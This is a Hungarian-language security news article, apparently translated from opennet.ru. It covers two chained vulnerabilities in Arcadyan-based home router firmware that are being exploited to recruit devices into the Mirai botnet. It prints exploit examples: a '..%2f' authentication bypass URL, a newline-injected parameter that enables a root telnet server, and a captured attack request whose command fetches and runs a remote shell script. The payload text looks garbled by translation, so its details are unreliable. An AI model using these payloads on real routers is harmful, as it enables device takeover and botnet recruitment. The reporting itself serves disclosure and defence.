Hatalmas támadást rögzítettek a hálózaton az otthoni útválasztók ellen, amelyek firmware-je az Arcadyan cég HTTP szerver implementációját használja. Az eszközök feletti irányítás megszerzéséhez két sebezhetőség kombinációját használják, amely lehetővé teszi tetszőleges kód távoli végrehajtását root jogokkal. A probléma az Arcadyan, az ASUS és a Buffalo ADSL-routereinek meglehetősen széles körét érinti, valamint a Beeline márkanév alatt szállított eszközöket (a probléma a Smart Box Flash-ben megerősített), a Deutsche Telekom, az Orange, az O2, a Telus, a Verizon, a Vodafone és a más távközlési szolgáltatók. Megjegyzendő, hogy a probléma több mint 10 éve jelen van az Arcadyan firmware-ben, és ez idő alatt sikerült áttérni legalább 20 eszközmodellre 17 különböző gyártótól.
Az első biztonsági rés, a CVE-2021-20090, lehetővé teszi bármely webes felület szkriptjének hitelesítés nélküli elérését. A sérülékenység lényege, hogy a webes felületen egyes könyvtárak, amelyeken keresztül képeket, CSS-fájlokat és JavaScript-szkripteket küldenek, hitelesítés nélkül elérhetők. Ebben az esetben a kezdeti maszk segítségével ellenőrzik azokat a könyvtárakat, amelyekhez hitelesítés nélküli hozzáférés engedélyezett. A „../” karakterek megadását a szülőkönyvtárhoz vezető útvonalakban a firmware blokkolja, de a „..%2f” kombinációt kihagyja. Így lehetőség van védett oldalak megnyitására olyan kérések küldésekor, mint a „http://192.168.1.1/images/..%2findex.htm”.
A második biztonsági rés, a CVE-2021-20091, lehetővé teszi a hitelesített felhasználó számára, hogy módosítsa az eszköz rendszerbeállításait úgy, hogy speciálisan formázott paramétereket küld az apply_abstract.cgi szkriptnek, amely nem ellenőrzi az újsor karakter jelenlétét a paraméterekben. . Például egy ping művelet végrehajtásakor a támadó megadhatja a „192.168.1.2%0AARC_SYS_TelnetdEnable=1” értéket az ellenőrzött IP-címmel és a szkripttel rendelkező mezőben a /tmp/etc/config/ beállításfájl létrehozásakor. A .glbcfg beírja az „AARC_SYS_TelnetdEnable=1” sort, amely aktiválja a telnetd szervert, amely korlátlan parancshéj-hozzáférést biztosít root jogokkal. Hasonlóképpen, az AARC_SYS paraméter beállításával bármilyen kódot végrehajthat a rendszeren. Az első biztonsági rés lehetővé teszi egy problémás szkript hitelesítés nélküli futtatását a „/images/..%2fapply_abstract.cgi” néven elérve.
A biztonsági rések kihasználásához a támadónak képesnek kell lennie arra, hogy kérést küldjön arra a hálózati portra, amelyen a webes felület fut. A támadás terjedésének dinamikája alapján sok szolgáltató hozzáférést hagy eszközén a külső hálózatról, hogy a támogatási szolgáltatás egyszerűsítse a problémákat. Ha az interfészhez való hozzáférés csak a belső hálózatra korlátozódik, a „DNS rebinding” technikával külső hálózatról is végrehajtható támadás. A sérülékenységeket már aktívan használják az útválasztók Mirai botnethez való csatlakoztatására: POST /images/..%2fapply_abstract.cgi HTTP/1.1 Csatlakozás: bezárás User-Agent: Dark action=start_ping&submit_button=ping.html& action_params=blink_time%3D5&ARC_212.192.241.7_.ipaddress=0. 1%0A ARC_SYS_TelnetdEnable=212.192.241.72& %212.192.241.72AARC_SYS_=cd+/tmp; wget+http://777/lolol.sh; curl+-O+http://0/lolol.sh; chmod+4+lolol.sh; sh+lolol.sh&ARC_ping_status=XNUMX&TMP_Ping_Type=XNUMX
Forrás: opennet.ru